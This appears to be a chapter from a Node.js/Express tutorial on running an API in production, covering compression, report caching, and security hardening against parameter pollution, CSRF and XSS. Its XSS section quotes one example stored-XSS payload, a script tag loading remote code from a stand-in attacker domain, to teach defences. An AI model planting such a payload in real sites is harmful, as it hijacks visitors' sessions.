Our API is currently set up to send uncompressed responses to clients. For larger responses, this will increase load times. Browsers and other clients support gzip compression to reduce the amount of data that our API needs to send.
For many sources of JSON data, it’s not uncommon to be able to reduce the transfer size by 80-90%. This means that to transfer 130k of JSON data, the API would only need to transfer 14k of compressed data.
How we take advantage of compression will depend on how we choose to deploy our API. Most load balancers and reverse proxies will handle this automatically if we set the correct content-type response header. This means that if we use a platform like Heroku or Google App Engine, we generally don’t have to worry about compressing the data ourselves. If we’re using something like Nginx, there are modules like ngx_http_gzip_module to take care of it.
If we’re allowing clients to connect directly to our API without using a platform or a reverse proxy like Nginx, we should use the compression middleware for express.
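Enabling it is a one-line middleware call; a minimal sketch:

const express = require('express')
const compression = require('compression')

const app = express()

// compress all responses for clients that advertise gzip support
app.use(compression())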
Caching and Optimization
Sometimes we’ll have endpoints that take a long time to return data or are accessed so frequently that we want to optimize them further. For example, we may want a route that returns the top selling products for each category. If we need to process a lot of sales data to come up with this report, and the data doesn’t need to be real-time, we won’t want to generate it for each request.
We have a few options for solving this problem, each with its own tradeoffs. In general, we’d like to minimize client response times, report staleness, and wasted work.
One approach would be to look for the finished, assembled report in our database. If a recent report is already there, serve it. However, if a recent report is not there, create it on the fly, save it to the database (with a timestamp and/or TTL), and finally return it to the client.
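A sketch of this pattern is below; the Reports collection, the generateReport() helper, and the one-hour window are all hypothetical:

const ONE_HOUR = 60 * 60 * 1000

async function topProducts (req, res, next) {
  // serve the stored report if it's still fresh
  const cached = await Reports.findOne({ name: 'top-products' })
  if (cached && Date.now() - cached.createdAt < ONE_HOUR) {
    return res.json(cached.data)
  }

  // otherwise generate it on the fly, store it with a timestamp,
  // and return it to the client
  const data = await generateReport()
  await Reports.updateOne(
    { name: 'top-products' },
    { name: 'top-products', data, createdAt: Date.now() },
    { upsert: true }
  )
  res.json(data)
}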
This works well for resources that are requested frequently relative to the expiration time. However, if the report expires after an hour and is accessed only once per hour, this method won’t help. This method also does not work if generating the report takes longer than a client is able to wait. It’s common for load balancers and reverse proxies to time out after 60 seconds by default. If the report takes longer than the timeout duration, it will never reach the client.
If we are tolerant of serving stale versions, a variation on this method is to always serve the version we have in the database, but generate a fresh report for future requests. This will be fast for all requests (except the first), but clients will receive reports that are older than the expiration time.
Another approach is to have separate endpoints for creating and serving the report. The app will always serve the cached version, but it is the responsibility of our system to make sure that the cached version is always up to date. In this scenario, if we wanted the maximum age of reports to be one hour, we would use cron or another scheduling tool, such as Heroku Scheduler or Google App Engine Cron Service, to access the report creation endpoint at least once per hour.
When creating endpoints for longer-running tasks like report creation, we should be sure that they are not easily or accidentally triggered. These tasks should not respond with information, so they aren’t particularly sensitive, but if they are too slow to be used in real-time, they probably use a lot of our application’s resources and should not be run more frequently than necessary. In general, these endpoints should use POST instead of GET, so that they can’t be triggered via a browser’s URL bar or a hyperlink. Taking it a step further, these endpoints could also require authentication or limit access to specific IP ranges.
In Node.js our route handler will be able to get the IP address via req.connection.remoteAddress. However, if our production app is behind a load balancer or reverse proxy, this value will be the load balancer's address, not the client's. Typically, the client's IP address will be available at req.headers['x-forwarded-for'], but this can depend on the deployment environment.
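A small helper can smooth over the difference; this is a sketch, since exact header handling depends on the proxy in front of us:

function clientIp (req) {
  // behind a load balancer, x-forwarded-for holds a comma-separated
  // chain of addresses; the original client is usually the first entry
  const forwarded = req.headers['x-forwarded-for']
  if (forwarded) return forwarded.split(',')[0].trim()
  return req.connection.remoteAddress
}

With express, we could alternatively enable app.set('trust proxy', true) and read req.ip.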
Locking Down Your Server
Security is a large topic, but there are a number of simple things we can do to protect our API.
X-Powered-By and Internal Implementation Disclosure
In the previous section we could see all of the response headers in the logs. The x-powered-by header advertises that our server uses express. We gain no advantage by telling the world that we’re running on express. It’s nice to give some publicity to projects we like, but from a security point of view, it’s not a good idea. We want to avoid publicly announcing what software we’re running. Another name for this is Internal Implementation Disclosure.
If a new express vulnerability is released, bad actors will scan for targets, and we don’t want to show up in that search. We can easily avoid this by using app.disable() to tell express not to send the x-powered-by header:
const app = express()
app.disable('x-powered-by')
HPP: HTTP Parameter Pollution
One thing that can throw people off is how express parses query strings. If a URL comes in with duplicate keys in the query string, express will helpfully set the value of that key to an array. Here’s an example:
http://localhost:1337/products?tag=dog
When our route handler runs, req.query.tag is equal to 'dog'. But if we were to get this URL:
http://localhost:1337/products?tag=dog&tag=cat
req.query.tag is now equal to ['dog', 'cat']. Instead of getting a string, we get an array. Sometimes this can be helpful, but if our route handler and model aren’t prepared, it can lead to errors or security problems.
If we wanted to ensure that parameters can’t be coerced into arrays, we could use the hpp middleware module.
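Wiring it up is a single middleware call; by default hpp keeps only the last value of a repeated parameter. A sketch:

const hpp = require('hpp')

// collapse repeated query parameters so handlers always see a string
app.use(hpp())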
CSRF: Cross-Site Request Forgery
CSRF attacks are dangerous. If a malicious agent created a successful CSRF attack they would be able to perform admin actions without permission (e.g. create/edit/delete products).
To create an attack against a vulnerable API, the attacker would create a new page for an admin user to visit. This malicious page would send requests to the vulnerable API on behalf of the admin user. Because the requests would come from the admin user’s browser, the requests are authenticated with admin cookies.
An interesting characteristic of CSRF is that the attacker might be able to force the target (e.g. admin user) to make requests, but the attacker has no way to see the responses. CSRF is primarily used to take action as another user, not to access private data.
So how does this affect us?
Our app is not affected, for two primary reasons. First, our cookies are HttpOnly and can’t be read by JavaScript (our JS clients use JWTs directly), and second, while browsers can submit HTML forms without JavaScript, they can’t POST the JSON bodies our API requires. This means that a malicious agent can’t create an external page that would be able to impersonate our users.
However, if we changed our app so that logins and model editing worked with HTML forms, CSRF could be an issue. For more information on mitigating CSRF attacks, see Understanding CSRF and the csurf CSRF protection middleware.
Additionally, we can set the SameSite=Strict attribute on our cookies. This tells browsers not to send the cookie along with cross-site requests, which blocks CSRF at the cookie level.
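For example, if our login handler sets the JWT cookie with res.cookie(), this is a one-line change (a sketch of what that might look like):

// mark the auth cookie HttpOnly so scripts can't read it, and
// SameSite=Strict so browsers won't attach it to cross-site requests
res.cookie('jwt', token, { httpOnly: true, sameSite: 'strict' })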
XSS: Cross-Site Scripting
XSS is a big issue when dealing with web app security. Similar to CSRF, XSS attacks would allow malicious agents to impersonate our users and perform actions on our API.
To create a successful XSS attack, an agent needs to be able to get malicious code to run within the scope of an authenticated client. For example, let’s say that we allow users to write comments about products, and the front-end displays those comments on the product page. A malicious user could add this script tag as a comment: <script src="https://evildomain.com/remotecontrol.js"></script>. If no filtering happens before the comment is rendered on the product page, and the HTML is left untouched, any browser that visits that product page will execute that evil script. This is a big problem because that script will be able to see all information on the page and make requests as that front-end.
XSS is a bigger deal than CSRF because unlike CSRF, XSS does not use an externally controlled page. XSS uses the authenticated front-end itself to send requests. This means that the back-end can’t know that these are not legitimate requests by the user.
Because XSS is an attack that compromises the front-end, it is the responsibility of the front-end to prevent running unauthorized code. This means that the front-end should sanitize all rendered HTML (e.g. prevent comments from adding script tags in our above example) and use CSP (Content Security Policy) to prevent loading code from untrusted sources.
In some cases, we can be proactive on the back-end. If we know that a data field is likely to be rendered on a page, we can use validation or filtering to prevent storing HTML in our database. For more information on XSS see the following resources:
- Guide to understanding XSS
- Cross-site Scripting (XSS)
- What is Reflected XSS?
- XSS (Cross Site Scripting) Prevention Cheat Sheet
Wrapping Up
In this chapter we’ve deployed our app and covered many aspects of running our service in production. DevOps and security are entire fields on their own, but this should be a good start to get us going. One of the most important things is that we stay flexible and watch for ways to improve our app.